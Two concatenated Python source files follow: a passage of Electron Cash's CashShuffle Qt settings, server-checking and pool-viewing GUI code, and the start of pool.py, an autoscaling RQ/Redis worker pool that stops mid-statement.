grid.addWidget(self.cb, 0, 1)
grid.addWidget(QLabel(_("Host"), self), 1, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 1, 1, 1, 2); grid.setColumnStretch(2, 1)
self.le = QLineEdit(self); hbox.addWidget(self.le)
self.le.textEdited.connect(lambda x='ignored': self.formChanged.emit())
hbox.addWidget(QLabel(_("P:"), self))
self.sb = QSpinBox(self); self.sb.setRange(1, 65535); hbox.addWidget(self.sb)
self.sb.valueChanged.connect(lambda x='ignored': self.formChanged.emit())
self.chk = QCheckBox(_("SSL"), self); hbox.addWidget(self.chk)
self.chk.toggled.connect(lambda x='ignored': self.formChanged.emit())
self.cb.currentIndexChanged.connect(lambda x='ignored': self.from_combobox())
self.from_combobox()
hbox2 = QHBoxLayout()
vbox.addLayout(hbox2)
self.statusGB = QGroupBox(_("Status"), self)
hbox2.addWidget(self.statusGB)
vbox2 = QVBoxLayout(self.statusGB)
self.statusLabel = QLabel("", self.statusGB)
self.statusLabel.setMinimumHeight(50)
self.statusLabel.setAlignment(Qt.AlignAbsolute|Qt.AlignTop)
vbox2.addWidget(self.statusLabel)
# add the "Coin selection settings..." link
self.coinSelectionSettingsLabel = QLabel("<a href='dummy'>{}</a>".format(_("Coin selection settings...")))
self.coinSelectionSettingsLabel.linkActivated.connect(self.onCoinSelectionSettingsClick)
vbox.addWidget(self.coinSelectionSettingsLabel)
self.vbox = vbox
if not isinstance(self, SettingsTab):
# add close button only if not SettingsTab
vbox.addStretch()
buttons = Buttons(CloseButton(self), OkButton(self))
vbox.addLayout(buttons)
# NEW! add the "View pools..." button to the bottom
vbox = self.statusGB.layout()
hbox = QHBoxLayout()
hbox.addStretch(1)
self.poolsBut = QPushButton(_("View pools..."))
f = self.poolsBut.font(); f.setPointSize(f.pointSize()-(2 if sys.platform=='darwin' else 1)); self.poolsBut.setFont(f)
hbox.addWidget(self.poolsBut)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.statusChanged.connect(self._vpGotStatus)
self.poolsBut.setEnabled(False)
self.poolsBut.clicked.connect(self._vpOnPoolsBut, Qt.DirectConnection)
def kill(self):
self.stopNetworkChecker()
def onCoinSelectionSettingsClick(self, ignored):
win = CoinSelectionSettingsWindow()
win.exec_()
win.deleteLater()
if self.window().isVisible():
self.window().raise_()
self.activateWindow()
def _vpGotStatus(self, sdict):
self._vpLastStatus = sdict.copy()
if sdict.get('status') in (_("Ok"), _("Banned")):
self.poolsBut.setEnabled(True)
else:
self.poolsBut.setEnabled(False)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=True)
def _on_statusChanged(self, d):
red, blue, green = "red", "blue", "green"
try: red, blue, green = ColorScheme.RED._get_color(0), ColorScheme.BLUE._get_color(0), ColorScheme.GREEN._get_color(0)
except AttributeError: pass
#self.print_error("status changed", d)
if not d: # Empty dict means we are connecting
self.serverOk = None
self.statusLabel.setText("<font color=\"{}\"><i>{}</i></font>".format(blue, _("Checking server...")))
return
if d.get('failed'): # Dict with only 1 key, 'failed', means connection failed
reason = d['failed']
if reason == 'offline_mode':
reason = _("Electron Cash is in offline mode.")
elif reason == 'bad':
reason = _("Server is misconfigured")
elif reason == 'ssl':
reason = _("Failed to verify SSL certificate")
else:
reason = _("Connection failure")
self.statusLabel.setText("<b>" + _("Status") + ":</b> <font color=\"{}\">{}</font>".format(red, reason))
self.serverOk = False
return
# any other case has all the below keys defined
self.serverOk = d['status'] == _('Ok')
self.statusLabel.setText(
'''
<b>{}:</b> <i>{}</i><br>
<b>{}:</b> <font color="{}">{}</font> {} {}
<small>{}: {} {}: {} {}: {}</small>
'''
.format(_('Server'), _elide(d['host'], maxlen=40, startlen=12),
_('Status'), green if not d['banned'] else "#dd4444", d['status'], " <b>{}</b> {}".format(_("Ban score:"),d['banScore']) if d['banScore'] else '', '<br>' if d['banScore'] else '',
_('Pool size'), d['poolSize'],
_('Connections'),
d['connections'],
_('Active pools'), d['pools'])
)
def _on_formChange(self):
try:
#self.print_error("onFormChange")
d = self.get_form()
self.settingsChanged.emit(d)
except RuntimeError as e:
# Paranoia guard against C++ object deleted exception
# (we may get called from a QTimer.singleShot below)
if 'C++' not in str(e).upper():
raise
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = NetworkChecker(self)
self.statusChanged.connect(self._on_statusChanged, Qt.QueuedConnection)
self.formChanged.connect(self._on_formChange, Qt.QueuedConnection)
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(100, self._on_formChange) # kicks off the network checker by sending it new settings
def stopNetworkChecker(self):
if self.networkChecker:
try: self.statusChanged.disconnect(self._on_statusChanged)
except TypeError: pass # not connected
try: self.formChanged.disconnect(self._on_formChange)
except TypeError: pass # not connected
self.networkChecker.stop()
self.networkChecker = None
self.print_error("Stopped network checker.")
# /
# /SettingsDialogMixin
class SettingsDialog(SettingsDialogMixin, AppModalDialog):
''' Concrete class for the stand-alone Settings window you get when
you right-click and get "CashShuffle Settings..." from the CashShuffle status
button context menu '''
def __init__(self, title, config, message=None, windowFlags=None):
AppModalDialog.__init__(self, title=title, windowFlags=windowFlags, parent=None)
self.setMinimumSize(400, 350)
SettingsDialogMixin.__init__(self, config=config, message=message)
# /SettingsDialog
class SettingsTab(SettingsDialogMixin, QWidget):
# Apparently if you inherit from a C++ object first it creates problems.
# You are supposed to inherit from the mixins in Python first, then the
# Qt C++ object last. Who knew. All of the Electron Cash codebase apparently
# is doing it wrong.
# See this: http://python.6.x6.nabble.com/Issue-with-multiple-inheritance-td5207771.html
# So we inherit from our mixin first. (Note I had problems with overriding
# __init__ here and Qt's C++ calling the wrong init here.)
applyChanges = pyqtSignal(object)
def __init__(self, parent, config, message=None):
QWidget.__init__(self, parent=parent)
SettingsDialogMixin.__init__(self, config=config, message=message)
# add the "Apply" button to the bottom
self.apply = QPushButton(_("Apply"), self)
hbox = QHBoxLayout()
self.vbox.addLayout(hbox)
self.vbox.addStretch()
hbox.addStretch(1)
hbox.addWidget(self.apply)
self.apply.clicked.connect(self._re_emit_applyChanges)
def _re_emit_applyChanges(self):
self.applyChanges.emit(self)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=False, parent_window=self)
# /SettingsTab
class NetworkChecker(PrintError):
''' Runs in a separate thread, checks the server automatically when the settings form changes
and publishes results to GUI thread. '''
pollTimeSecs = 15.0
checkShufflePort = True
verifySSL = True # if true, verify the ssl socket of the shuffle port when checking the server
def __init__(self, parent):
assert isinstance(parent, NetworkCheckerDelegateMixin), "Parent to NetworkChecker must be a NetworkCheckerDelegateMixin"
self.weakParent = Weak.ref(parent)
self.q = queue.Queue()
self.thread = threading.Thread(target=self.thread_func, daemon=True)
self._please_stop = False
self._sock = None
self._update_ct = 0
parent.settingsChanged.connect(self._on_settings_changed, Qt.QueuedConnection)
self.print_error("created")
finalization_print_error(self)
def stop(self):
if self.thread.is_alive():
self._please_stop = True
self.q.put(None) # signal to thread to die
try: self._sock.close() # force close thread
except: pass
self.thread.join(timeout=15.0) # wait for thread to finish
if self.thread.is_alive():
# This should never happen
self.print_error("*** WARNING: Waited for thread to exit for 15.0 seconds, but it is still running! FIXME!")
def start(self):
if not self.thread.is_alive():
self.q.put(None) # paranoia just in case
self.q = queue.Queue() # clear the queue
self._please_stop = False
self.thread.start() # this raises RuntimeError if called more than once.
def _on_settings_changed(self, d):
self._update_ct = 0 # reset ctr for these settings. ctr = 0 causes us to tell gui to draw the "Connecting, please wait..." text
self.q.put(d.copy()) # notify thread which waits on this q
def _wait_drain_q(self, last_settings):
q = self.q
try:
res = None
try:
# Drain queue to get latest settings
while True:
# keep reading from the queue until it's empty
res = q.get_nowait()
if res is None:
# we got a None, return early -- this indicates abort thread
return res
except queue.Empty:
''' No settings were waiting in queue.. move to blocking
operation '''
if self._please_stop:
return # indicate stop
if res is not None:
# we had a result, return
return res
# no result from Queue, block for pollTimeSecs
return q.get(timeout=self.pollTimeSecs)
except queue.Empty:
# no result in pollTimeSecs, return last settings value
return last_settings
def thread_func(self):
try:
self.print_error("thread entered")
settings = dict()
while True:
settings = self._wait_drain_q(settings)
if settings is None:
return # exit thread if we got a None
if settings:
self._on_update_status(settings)
finally:
self.print_error("thread exiting")
def _emit_status_changed(self, d):
self.weakParent() and self.weakParent().statusChanged.emit(d)
def _on_update_status(self, d):
d = d.copy()
#self.print_error("updateStatus", d) # XXX
is_bad_server, is_bad_ssl, is_offline_mode = False, False, False
try:
if not Network.get_instance():
is_offline_mode = True
raise RuntimeError("No network")
if self._update_ct == 0:
self._emit_status_changed(dict()) # tells GUI we are "connecting..."
self._update_ct += 1
port, poolSize, connections, pools, banScore, banned = query_server_for_stats(d['server'], d['info'], d['ssl'])
if self._please_stop:
return
if poolSize < 3:
# hard-coded -- do not accept servers with poolSize < 3
is_bad_server = True
raise RuntimeError("PoolSize must be >=3, got: {}".format(poolSize))
if d['ssl'] and self.verifySSL and not verify_ssl_socket(d['server'], int(port), timeout=7.5):
is_bad_ssl = True
raise RuntimeError("Could not verify SSL server certificate.")
if self._please_stop:
return
if self.checkShufflePort:
self._sock = socket.create_connection((d['server'], port), 5.0) # test connectivity to port
self._sock.close()
self._sock = None
if self._please_stop:
return
self._emit_status_changed({
'host' : d['server'],
'status' : _('Ok') if not banned else _('Banned'),
'poolSize' : str(poolSize),
'connections' : str(connections),
'pools' : str(len(pools)),
'poolsList' : pools,
'banScore' : banScore,
'banned' : banned,
'name' : d['server'] + ":" + str(d['info']),
'info' : d['info'],
'ssl' : d['ssl'],
})
except Exception as e:
# DEBUG
#import traceback
#traceback.print_exc()
# /DEBUG
self.print_error("exception on connect:",str(e))
if is_offline_mode:
self._emit_status_changed({'failed' : 'offline_mode'})
elif is_bad_ssl:
self._emit_status_changed({'failed' : 'ssl'})
elif is_bad_server:
self._emit_status_changed({'failed' : 'bad'})
else:
self._emit_status_changed({'failed' : 'failed'})
# / NetworkChecker
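# Hedged usage sketch (illustrative only, not part of the plugin): any QObject
# that mixes in NetworkCheckerDelegateMixin can drive a NetworkChecker the way
# SettingsDialogMixin and PoolsWindow do above. The settings dict keys mirror
# get_form(); the host/port values below are assumptions.
#
#   checker = NetworkChecker(delegate)          # delegate: a QObject that is also a NetworkCheckerDelegateMixin
#   delegate.statusChanged.connect(on_status)   # receives {} (connecting), {'failed': ...}, or the full stats dict
#   checker.start()
#   delegate.settingsChanged.emit({'server': 'shuffle.example.com', 'info': 8080, 'ssl': True})
#   ...
#   checker.stop()                              # joins the worker thread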
class PoolsWinMgr(QObject, PrintError):
simpleChangedSig = pyqtSignal()
_instance = None
def __init__(self):
assert not PoolsWinMgr._instance, "More than 1 PoolsWinMgr instance detected -- PoolsWinMgr is a singleton!"
super().__init__()
PoolsWinMgr._instance = self
self.poolWindows = {}
self.print_error("created")
#DEBUG
destroyed_print_error(self)
def __del__(self):
stale = True
if PoolsWinMgr._instance is self:
PoolsWinMgr._instance = None
stale = False
print_error("[{}] finalized{}".format(__class__.__name__, " (stale instance)" if stale else ''))
if hasattr(super(), '__del__'):
super().__del__()
#public methods
@classmethod
def instance(cls, create_if_missing=True):
if not cls._instance and create_if_missing:
cls._instance = cls()
return cls._instance
@classmethod
def killInstance(cls):
if cls._instance:
cls._instance._killAll()
cls._instance.deleteLater()
cls._instance = None
@classmethod
def closeAll(cls):
''' This implicitly will also delete all the windows when event loop next runs. '''
app = QApplication.instance()
if app:
poolWins = [w for w in app.topLevelWidgets() if isinstance(w, PoolsWindow)]
for w in poolWins:
w.close()
@classmethod
def show(cls, stats_dict, network_settings, config, *, parent_window=None, modal=False):
mgr = cls.instance()
return mgr._createOrShow(stats_dict, network_settings, config, parent_window=parent_window, modal=modal)
#private methods
def _createOrShow(self, stats_dict, network_settings, config, *, parent_window=None, modal=False):
d = stats_dict
if not isinstance(d, dict) or not d or not network_settings:
self.print_error("createOrShow: got invalid args.. will not create/show a window")
return
name = d['name']
w = self.poolWindows.get(name)
if w and ((modal and w.windowModality() != Qt.ApplicationModal)
or (not modal and w.windowModality() != Qt.NonModal)):
self.print_error("Found extant window {} but modal spec != extant modal, killing...".format(name))
self._kill(name)
w = None
if not w:
self.print_error("Creating", name)
w = PoolsWindow(config, parent_window, d, network_settings, modal=modal)
self.poolWindows[name] = w
w.closed.connect(self._kill) # clean-up instance
else:
self.print_error("Updating", name)
w.weakParent = Weak.ref(parent_window) if parent_window else None
w.settings = network_settings
w.settingsChanged.emit(w.settings)
if w.isMinimized():
w.showNormal()
w.show(); w.raise_(); w.activateWindow()
return w
def _kill(self, name):
window = self.poolWindows.pop(name) # will actually delete the QWidget instance.
window.stopNetworkChecker()
window.deleteLater() # force Qt delete. This call may be superfluous
self.print_error("Killed", name)
def _killAll(self):
for n in self.poolWindows.copy():
self._kill(n)
# /PoolsWinMgr
class PoolsWindow(QWidget, PrintError, NetworkCheckerDelegateMixin):
closed = pyqtSignal(str)
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
def __init__(self, config, pseudo_parent, serverDict, settings, modal=False):
super().__init__() # top-level window
self.setWindowModality(Qt.ApplicationModal if modal else Qt.NonModal)
self.config = config
self.weakParent = Weak.ref(pseudo_parent) if pseudo_parent else None
self.sdict = serverDict.copy()
self.settings = settings
self.networkChecker = None
self.needsColumnSizing = True
name = self.sdict['name']
self.setObjectName(name)
self.setWindowTitle("CashShuffle - {} - Pools".format(_elide(name)))
self.vbox = QVBoxLayout(self)
# pools group box
self.poolsGB = QGroupBox(_("{} Pools").format(_elide(name)) + " (0)")
self.vbox.addWidget(self.poolsGB)
self.vbox.setStretchFactor(self.poolsGB, 2)
vbox2 = QVBoxLayout(self.poolsGB)
# ban label
self.banLabel = HelpLabel('', _("Bans usually occur when other shufflers detected invalid inputs coming from your client. Bans are temporary and usually last up to 30 minutes.\n\nThey may happen occasionally in rare circumstances. However, if this keeps happening please contact the developers and file a bug report."))
self.banLabel.setHidden(True)
vbox2.addWidget(self.banLabel)
self.tree = QTreeWidget()
self.tree.setSelectionMode(QAbstractItemView.NoSelection)
self.tree.setMinimumHeight(50)
self.tree.setHeaderItem(QTreeWidgetItem([_('Tier'), _('Players'), _('Type'), _('Version'), _('Full')]))
vbox2.addWidget(self.tree)
# The "simple view" checkbox
hbox = QHBoxLayout()
self.simpleChk = QCheckBox(_("Omit incompatible pools")) # NB: checkbox state will be set in self.refresh()
hbox.addWidget(self.simpleChk)
vbox2.addLayout(hbox)
# bottom buts
self.vbox.addStretch()
hbox = QHBoxLayout()
self.closeBut = QPushButton(_("Close"))
hbox.addStretch(1)
hbox.addWidget(self.closeBut)
self.vbox.addLayout(hbox)
# signals
self.closeBut.clicked.connect(self.close)
self.closeBut.setDefault(True)
self.statusChanged.connect(self.refresh)
self.simpleChk.clicked.connect(self._setSimple)
# NB: some signal/slot connections are also made in showEvent()
# etc...
self.resize(400,300)
#DEBUG
destroyed_print_error(self)
def diagnostic_name(self):
return "{}/{}".format(super().diagnostic_name(), self.objectName())
def closeEvent(self, e):
#self.print_error("Close")
self.closed.emit(self.objectName())
parent = self.weakParent and self.weakParent()
if isinstance(parent, QWidget) and parent.isVisible() and parent.window().isVisible():
try:
# for some reason closing this dialog raises the wallet window and not the network dialog
# activate the network dialog if it's up..
parent.window().activateWindow()
except RuntimeError as e:
# Deal with wrapped C/C++ object deleted. For some reason
# the weakRef is still alive even after C/C++ deletion
# (and no other references referencing the object!).
if 'C++' in str(e):
self.print_error("Underlying C/C++ object deleted. Working around PyQt5 bugs and ignoring...")
else:
raise
super().closeEvent(e)
e.accept()
def hideEvent(self, e):
super().hideEvent(e)
if e.isAccepted():
#self.print_error("Hide")
try: PoolsWinMgr.instance().simpleChangedSig.disconnect(self._simpleChangedSlot)
except TypeError: pass # Not connected.
self.stopNetworkChecker()
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
#self.print_error("Show")
PoolsWinMgr.instance().simpleChangedSig.connect(self._simpleChangedSlot)
self.refresh(self.sdict)
self.startNetworkChecker()
# do stuff related to refreshing, etc here...
def _isSimple(self):
return bool(self.config.get(ConfKeys.Global.VIEW_POOLS_SIMPLE, True))
def _setSimple(self, b):
b = bool(b)
if b != self._isSimple():
self.config.set_key(ConfKeys.Global.VIEW_POOLS_SIMPLE, b)
self.needsColumnSizing = True
PoolsWinMgr.instance().simpleChangedSig.emit()
def _simpleChangedSlot(self):
self.refresh(self.sdict)
def refresh(self, sdict):
# NB: sdict may be non-empty (has actual results) but still contain no
# pools if server has no pools. It's only empty before we get a response
# from stats port.
if not sdict:
return
if self.sdict is not sdict:
self.sdict = sdict.copy()
simple = self._isSimple()
self.simpleChk.setChecked(simple)
mysettings = BackgroundShufflingThread.latest_shuffle_settings
# handle if we detected a ban
if self.sdict.get('banned'):
banScore = self.sdict.get('banScore') or 0
self.banLabel.setText('<font color="#dd4444"><b>{}</b></font> (ban score: {})'.format(_("Banned"), banScore))
self.banLabel.setHidden(False)
else:
self.banLabel.setHidden(True)
pools = self.sdict.get('poolsList', list()).copy()
poolSize = str(self.sdict.get('poolSize', ''))
self.tree.clear()
try:
pools.sort(reverse=True, key=lambda x:(0 if x['full'] else 1, x['amount'], x['members'], -x.get('version',0)))
except (KeyError, ValueError, TypeError):
# hmm. Pools dict is missing or has bad keys. Assume bad input. Clear list and proceed with a 'no pools' message
pools = []
for c in range(2,4):
self.tree.setColumnHidden(c, simple)
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
for p in pools:
typ, version = p.get('type', mysettings.type_name), p.get('version', mysettings.version)
is_my_settings = typ == mysettings.type_name and version == mysettings.version
if not simple or is_my_settings:
twi = QTreeWidgetItem([
format_satoshis_plain(p['amount']) + " BCH",
"{} / {}".format(str(p['members']), poolSize),
str(p.get('type','?')).lower(),
str(p.get('version','?')),
"√" if p['full'] else '-',
])
if not is_my_settings:
grayify(twi)
self.tree.addTopLevelItem(twi)
tit = self.poolsGB.title().rsplit(' ', 1)[0]
self.poolsGB.setTitle(tit + " ({})".format(self.tree.topLevelItemCount()))
def sizeColumnsToFit():
for i in range(self.tree.columnCount()):
self.tree.resizeColumnToContents(i)
if not self.tree.topLevelItemCount():
twi = QTreeWidgetItem([_('No Pools'), '', '', '', ''])
f = twi.font(0); f.setItalic(True); twi.setFont(0, f)
self.tree.addTopLevelItem(twi)
self.tree.setFirstItemColumnSpanned(twi, True)
self.tree.setHeaderHidden(True)
sizeColumnsToFit() # in no pools mode we unconditionally size to fit
self.needsColumnSizing = True # once we enter this "No pools.." mode, we need to force resize columns next time we have real entries to avoid layout weirdness
else:
self.tree.setHeaderHidden(False)
if self.needsColumnSizing: # this flag suppresses resizing each refresh to allow users to manually size the columns after a display with real data appears.
sizeColumnsToFit()
self.needsColumnSizing = False
def _kick_off_nc(self):
try:
self.settingsChanged.emit(self.settings) # kicks off the NetworkChecker by sending it some server settings to check
except RuntimeError:
pass # paranoia: guard against wrapped C++ object exception.. shouldn't happen because timer was keyed off this object as receiver
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = nc = NetworkChecker(self)
nc.pollTimeSecs, nc.verifySSL, nc.checkShufflePort = 2.0, False, False
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(500, self._kick_off_nc) # despite appearances, the timer will not fire after object deletion due to PyQt5 signal/slot receiver rules
def stopNetworkChecker(self):
if self.networkChecker:
self.networkChecker.stop() # waits for network checker to finish...
self.networkChecker = None
self.print_error("Stopped network checker.")
# /PoolsWindow
class CoinSelectionSettingsWindow(AppModalDialog, PrintError):
''' The pop-up window to manage minimum/maximum coin amount settings.
Accessible from a link in the "CashShuffle Settings.." window or Network
Dialog tab. '''
def __init__(self, title=None):
super().__init__(title=title or _("CashShuffle - Coin Selection Settings"), parent=None)
vbox = QVBoxLayout(self)
lbl = QLabel(_("Specify minimum and maximum coin amounts to select for shuffling:"))
lbl.setWordWrap(True)
vbox.addWidget(lbl)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Minimum coin:"),
_("Coins (UTXOs) below this amount will not be selected for shuffling.")))
self.minEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.minEdit)
vbox.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Maximum coin:"),
_("Coins (UTXOs) up to this amount will be selected for shuffling.")))
self.maxEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.maxEdit)
vbox.addLayout(hbox)
self.maxEdit.textEdited.connect(self.clearErr)
self.minEdit.textEdited.connect(self.clearErr)
vbox.addStretch()
self.errLabel = QLabel("")
self.errLabel.setAlignment(Qt.AlignCenter)
vbox.addWidget(self.errLabel)
vbox.addStretch()
vbox.addLayout(Buttons(CancelButton(self),
EnterButton(_("Defaults"), self.default),
EnterButton(_("Apply"), self.apply),
))
self.resize(320,200)
self.fromConfig()
# DEBUG Qt destruction
destroyed_print_error(self)
def _decimal_point(self): return get_config().get('decimal_point', 8)
def _fmt_amt(self, amt): return format_satoshis_plain(amt, self._decimal_point())
def apply(self):
lower, upper = self.minEdit.get_amount(), self.maxEdit.get_amount()
if not lower or not upper or upper <= lower:
self.setErr(_("Invalid amount"))
return
hard_upper = BackgroundShufflingThread.hard_upper_bound()
if upper > hard_upper:
self.setErr(_("Upper limit is {}").format(self._fmt_amt(hard_upper)))
return
hard_lower = BackgroundShufflingThread.hard_lower_bound()
if lower < hard_lower:
self.setErr(_("Lower limit is {}").format(self._fmt_amt(hard_lower)))
return
if (lower, upper) != tuple(BackgroundShufflingThread.update_lower_and_upper_bound_from_config()):
pre = ''
if (lower, upper) == self._get_defaults():
BackgroundShufflingThread.reset_lower_and_upper_bound_to_defaults()
pre = _("Default values restored.\n\n")
else:
actual_lower, actual_upper = BackgroundShufflingThread.set_lower_and_upper_bound(lower, upper)
if (lower, upper) != (actual_lower, actual_upper):
pre = _("Actual amounts applied: {} and {}.\n\n").format(self._fmt_amt(actual_lower),
self._fmt_amt(actual_upper))
self.show_message(pre+_("Changes will take effect when the next shuffle round starts (usually within a few minutes)."))
self.accept()
def fromConfig(self):
lower, upper = BackgroundShufflingThread.update_lower_and_upper_bound_from_config()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def _get_defaults(self): return BackgroundShufflingThread.DEFAULT_LOWER_BOUND, BackgroundShufflingThread.DEFAULT_UPPER_BOUND
def default(self):
lower, upper = self._get_defaults()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def setErr(self, txt='', noerr=False):
txt = txt or ""
if noerr:
try: color = ColorScheme.DEFAULT._get_color(0)
except AttributeError: color = "#666666"
else:
try: color = ColorScheme.RED._get_color(0)
except AttributeError: color = "red"
self.errLabel.setText('<font color="{}">{}</font>'.format(color, txt))
def clearErr(self): self.setErr('', noerr=True)
# /CoinSelectionSettingsWindow
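# Hedged usage sketch (illustrative; assumes a running QApplication, an
# Electron Cash config object named `config`, and that AppModalDialog behaves
# like a QDialog with exec_()):
#
#   dlg = SettingsDialog(_("CashShuffle Settings"), config)
#   if dlg.exec_():
#       settings = dlg.get_form()   # {'server': ..., 'info': ..., 'ssl': ...}
#   dlg.deleteLater()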
|
pool.py
|
# -*- coding: utf-8 -*-
import time
import os
import signal
import random
import redis
import rq
import psutil
from Queue import Empty
from .log import logger
from .worker import Worker
from .accounting import PoolAccounting
from multiprocessing import Process, Queue
log = logger()
def msg_exit(wname):
return {'msg': 'exit', 'pid': os.getpid(), 'wname': wname}
def msg_update(wname):
return {'msg': 'update', 'pid': os.getpid(), 'wname': wname}
def msg_failed(wname):
return {'msg': 'failed', 'pid': os.getpid(), 'wname': wname}
def msg_started(wname):
return {'msg': 'started', 'pid': os.getpid(), 'wname': wname}
def _worker(wname, pool_queue, args):
log.debug("Worker %s started" % wname)
try:
pool_queue.put(msg_started(wname))
def exc_handler(job, *args):
log.error("Job %s Excepted" % (job.id))
def work_callback(job):
log.debug("Worker %s completed job %s %s" % (
wname, job.id, job.status))
if job.status == rq.job.Status.FAILED:
pool_queue.put(msg_failed(wname))
else:
pool_queue.put(msg_update(wname))
def status_callback():
"""
Controls execution of worker. Worker will exit when queue
is empty if this callback returns False
"""
if args['retire_idle']:
return False
return True
con = redis.StrictRedis(
host=args['host'], port=args['port'], password=args['password'],
db=args['db'])
queues = [rq.Queue(q, connection=con) for q in args['queues']]
rqw = Worker(
queues,
status_callback=status_callback,
exc_handler=exc_handler,
work_callback=work_callback,
connection=con)
rqw.log = log
rqw.work()
finally:
pool_queue.put(msg_exit(wname))
log.debug("Worker %s exited" % wname)
def enum(name, *sequential, **named):
values = dict(zip(sequential, range(len(sequential))), **named)
return type(name, (), values)
WorkerState = enum('WorkerState', STARTING='starting', RUNNING='running', TERMINATED='terminated')
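# e.g. WorkerState.RUNNING == 'running'; positional names passed to enum()
# would instead be numbered 0..n-1 via the zip() above.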
class Pool:
def __init__(
self, queues, host='localhost', port=6379, db=None,
password=None, zombie_timeout=400, **kwargs):
self.acct = PoolAccounting()
self.count = 0
self.workers = {}
# Lower limit on workers
self.min_procs = kwargs.setdefault('min_procs', 1)
# Upper limit on workers
self.max_procs = kwargs.setdefault('max_procs', 128)
# Maximum number of workers to start in a single round of scaling
self.max_per_scale = kwargs.setdefault('max_per_scale', 2)
# Seconds between updates before a worker is considered a zombie
self.zombie_timeout = zombie_timeout
# Minimum wait between spawns of new workers
self.scale_frequency = kwargs.setdefault('scale_frequency', 10.0)
# Maximum number of seconds waiting before we send a kill -9
self.terminate_seconds = kwargs.setdefault('terminate_seconds', 10.0)
# Number of seconds to wait while gathering initial stats on workers
# before scaling up
self.quiet_period_seconds = kwargs.setdefault(
'quiet_period_seconds', 10.0)
# Maximum cpu utilization
self.max_cpu = kwargs.setdefault('max_cpu', 80.0)
# Maximum mem utilization
self.max_mem = kwargs.setdefault('max_mem', 80.0)
self.args = kwargs
# Should workers without a job to do be spun down immediately?
self.args['retire_idle'] = kwargs.setdefault('retire_idle', True)
self.args['queues'] = queues
self.args['host'] = host
self.args['port'] = port
self.args['password'] = password
self.args['db'] = db
self.args['main_pid'] = os.getpid()
# Workers we've scaled down and are waiting on exiting
self.waiting_scale_down = []
self.stats = []
self.pool_queue = Queue()
self.con = redis.StrictRedis(
host=self.args['host'], port=self.args['port'], password=self.args['password'],
db=self.args['db'])
self.rqs = [rq.Queue(q, connection=self.con) for q in self.args['queues']]
def start(self):
self.start_time = time.time()
self.establish_baseline()
self.acct.start()
while True:
num_running, num_starting = self.update_workers()
self.acct.set_workers(num_running)
self.update_stats(num_running, num_starting)
total = num_running + num_starting
log.debug("Pool has %s active workers (%s starting)" % (
num_running, num_starting))
if num_running < self.min_procs:
self.add_worker()
else:
self.scale_pool(total)
time.sleep(1)
self.process_queue()
self.acct.log()
def establish_baseline(self):
cpu = []
mem = []
log.debug("Establishing a baseline reading for cpu & memory...")
for i in range(5):
cpu_pct = psutil.cpu_percent()
mem_pct = psutil.virtual_memory().percent
cpu.append(cpu_pct)
mem.append(mem_pct)
time.sleep(1)
self.baseline_cpu = sum(cpu) / float(len(cpu))
self.baseline_mem = sum(mem) / float(len(mem))
log.debug("Baseline cpu & memory reading: %s CPU %s Memory" % (
self.baseline_cpu, self.baseline_mem))
def process_queue(self):
while True:
try:
obj = self.pool_queue.get_nowait()
wname = obj['wname']
if wname not in self.workers:
log.warning("Received message %s from unknown %s" % (
obj, wname))
continue
worker = self.workers[wname]
if obj['msg'] == 'update':
worker['last_update'] = time.time()
elif obj['msg'] == 'exit':
log.debug("Worker %s exited" % worker['w'].name)
self.on_worker_exit(wname)
elif obj['msg'] == 'started':
worker['state'] = WorkerState.RUNNING
log.debug("Worker %s became ready" % worker['w'].name)
elif obj['msg'] == 'failed':
log.debug("Worker %s reported failure" % worker['w'].name)
worker['last_update'] = time.time()
self.acct.add_failed()
except Empty:
break
def count_outstanding_queue(self):
cnt = 0
for queue in self.rqs:
cnt += queue.count
return cnt
def on_worker_exit(self, wname):
self.acct.add_exited()
worker = self.workers[wname]
if worker in self.waiting_scale_down:
self.waiting_scale_down.remove(worker)
del self.workers[wname]
def update_stats(self, num_running, num_starting):
cpu_pct = psutil.cpu_percent()
mem_pct = psutil.virtual_memory().percent
log.debug("CPU %s Memory %s" % (cpu_pct, mem_pct))
self.stats.append((num_running, num_starting, cpu_pct, mem_pct))
if len(self.stats) > 30:
self.stats.pop(0)
def scale_pool(self, total_workers):
# Collect enough stats to matter
if (time.time() - self.start_time) < self.quiet_period_seconds:
return
# Don't scale too frequently
if time.time() - self.last_scale < self.scale_frequency:
return
outstanding = self.count_outstanding_queue()
log.debug("Outstanding queue length %s" % outstanding)
if not outstanding:
return
cpu_per_running = 0
mem_per_running = 0
for num_running, num_starting, cpu_pct, mem_pct in self.stats:
if num_running:
cpu_per_running += ((cpu_pct - self.baseline_cpu) / float(num_running))
mem_per_running += ((mem_pct - self.baseline_mem) / float(num_running))
avg_cpu_per_running = max(float(cpu_per_running) / len(self.stats), 0.01)
avg_mem_per_running = max(float(mem_per_running) / len(self.stats), 0.01)
cpu_pct = psutil.cpu_percent()
mem_pct = psutil.virtual_memory().percent
log.debug("CPU %s Mem %s AvgC/R %s AvgM/R %s" % (
cpu_pct, mem_pct, avg_cpu_per_running, avg_mem_per_running))
cpu_workers = (self.max_cpu - cpu_pct) / avg_cpu_per_running
mem_workers = (self.max_mem - mem_pct) / avg_mem_per_running
avail_workers = int(min(
self.max_procs - total_workers, min(cpu_workers, mem_workers)))
log.debug("%s CPU Bound Worker %s Mem Bound Worker %s Potential Workers" % (
